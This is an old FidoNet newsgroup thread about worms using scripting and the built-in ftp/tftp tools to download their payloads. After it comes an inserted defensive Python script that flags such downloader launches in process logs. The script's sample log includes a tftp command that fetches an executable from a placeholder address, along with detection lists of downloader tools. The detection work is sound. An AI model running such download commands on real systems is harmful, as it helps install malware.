echo: nthelp
to: Geo.
from: Rich
date: 2007-02-13 18:09:10
subject: Re: Windows PowerShell

From: "Rich" 

   I understand.  With your example you would be better using native code to call ftp, tftp, or whatever instead of native code to call PowerShell and then have it call ftp, tftp, or whatever.

Rich
  "Geo."  wrote in message news:45d26a23{at}w3.nls.net...
  The way you get in with a worm typically is by executing some simple code that then downloads the worm executable, sort of like a bootstrap operation. Things like scripting make it easier to do that stage one and get the download going.

  Granted, not always required; as an example, the SQL Server worm didn't need to use this technique, but most do. Certainly the latest NT worms, including the ones that hit NT4 machines, use this technique. They also use other handy stuff like ftp.exe or tftp.exe. The more capabilities, the easier it is to infect a system.

  That's why the old Macs were considered so secure: there just wasn't much to work with. It's also why, if Linux gets much more popular, the virus problem there will be far worse than anything we've seen on Windows.

  Geo.

  "Rich"  wrote in message news:45d1e42e$1{at}w3.nls.net...
     That's what I meant by "bypass the user".  Makes no difference.

  Rich

    "Geo."  wrote in message news:45d19efa$2{at}w3.nls.net...
    Think worms, not trojans. No user required.

    Geo.

    "Rich"  wrote in message news:45d131f1$1{at}w3.nls.net...
       Why?  If you can fool or bypass the user to run a program, you may as well run a native program.

    Rich
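
Geo's point above, that scripting plus a resident ftp.exe or tftp.exe is what gives a worm its "stage one" download, has a straightforward defensive counterpart: watch for those utilities being launched by script hosts, or by processes that have no business fetching files, and watch for the same downloader command line turning up on several machines. The script below is an added example, not code from this thread or from either poster. It runs over constructed process-creation log lines in a hypothetical one-line format and assumes the field names shown (real Sysmon or EDR exports differ); the severity tiers and the parent-process lists are assumptions for illustration.

```python
"""Flag ftp.exe / tftp.exe launched as a worm-style 'stage one' downloader,
using constructed process-creation log lines (not data from the thread)."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed sample records in a hypothetical one-line format (an assumption;
# real Sysmon/EDR exports look different). 203.0.113.5 is a documentation address.
SAMPLE_LOG = """\
2007-02-13T18:01:02Z host=WS01 pid=1204 ppid=612 parent=explorer.exe image=notepad.exe cmdline="notepad.exe notes.txt"
2007-02-13T18:01:09Z host=WS01 pid=1310 ppid=1204 parent=notepad.exe image=ftp.exe cmdline="ftp.exe"
2007-02-13T18:02:15Z host=WS02 pid=2001 ppid=1980 parent=services.exe image=svchost.exe cmdline="svchost.exe -k netsvcs"
2007-02-13T18:02:16Z host=WS02 pid=2044 ppid=2001 parent=svchost.exe image=tftp.exe cmdline="tftp.exe -i 203.0.113.5 GET a.exe"
2007-02-13T18:03:30Z host=WS03 pid=3100 ppid=3050 parent=cmd.exe image=powershell.exe cmdline="powershell.exe -File deploy.ps1"
2007-02-13T18:03:31Z host=WS03 pid=3122 ppid=3100 parent=C:\\Windows\\System32\\powershell.exe image=tftp.exe cmdline="tftp.exe -i 203.0.113.5 GET a.exe"
2007-02-13T18:04:00Z host=WS04 pid=4010 ppid=3990 parent=cmd.exe image=ftp.exe cmdline="ftp.exe -s:script.txt"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) '
    r'parent=(?P<parent>\S+) image=(?P<image>\S+) cmdline="(?P<cmdline>[^"]*)"$'
)

DOWNLOADERS = {"ftp.exe", "tftp.exe"}                              # utilities the thread names
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe"}     # assumed scripting parents
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}                  # assumed: someone at a console


@dataclass
class ProcessEvent:
    ts: str
    host: str
    pid: int
    ppid: int
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str
    severity: str


def basename(path: str) -> str:
    """Normalise 'C:\\Windows\\System32\\TFTP.EXE' or 'tftp.exe' to 'tftp.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> Optional[ProcessEvent]:
    """Parse one log line; return None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return ProcessEvent(
        ts=m["ts"], host=m["host"], pid=int(m["pid"]), ppid=int(m["ppid"]),
        parent=basename(m["parent"]), image=basename(m["image"]), cmdline=m["cmdline"],
    )


def severity_for(event: ProcessEvent) -> Optional[str]:
    """Severity for a downloader launch, or None if the image is not a downloader."""
    if event.image not in DOWNLOADERS:
        return None
    if event.parent in SCRIPT_HOSTS:
        return "high"    # script host bootstrapping a download: the stage-one pattern
    if event.parent in INTERACTIVE_PARENTS:
        return "low"     # console use; worth a look, rarely a worm
    return "medium"      # a service, an editor, etc. has no reason to fetch files


def find_stage_one_downloads(log_text: str) -> List[Finding]:
    """Return a Finding for every downloader launch in the log, in log order."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        sev = severity_for(ev)
        if sev:
            findings.append(Finding(ev.ts, ev.host, ev.parent, ev.image, ev.cmdline, sev))
    return findings


def spread_indicators(findings: List[Finding], min_hosts: int = 2) -> Dict[str, Set[str]]:
    """The same downloader command line on several hosts is a spread signal, not a one-off."""
    hosts_by_cmd: Dict[str, Set[str]] = defaultdict(set)
    for f in findings:
        hosts_by_cmd[f.cmdline].add(f.host)
    return {cmd: hosts for cmd, hosts in hosts_by_cmd.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    found = find_stage_one_downloads(SAMPLE_LOG)
    for f in found:
        print(f"{f.severity:6} {f.host} {f.parent} -> {f.image}  {f.cmdline}")
    for cmd, hosts in spread_indicators(found).items():
        print(f"SPREAD  {sorted(hosts)}  {cmd}")
```

On the constructed sample this yields four downloader launches (two medium, one high, one low) and one spread indicator: the identical tftp.exe command line seen on WS02 and WS03. The parent-process tiers are the judgement call; the host-correlation step is the part that separates a worm from an administrator running ftp once.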


--- BBBS/NT v4.01 Flag-5
* Origin: Barktopia BBS Site http://HarborWebs.com:8081 (1:379/45)

SOURCE: echomail via fidonet.ozzmosis.com
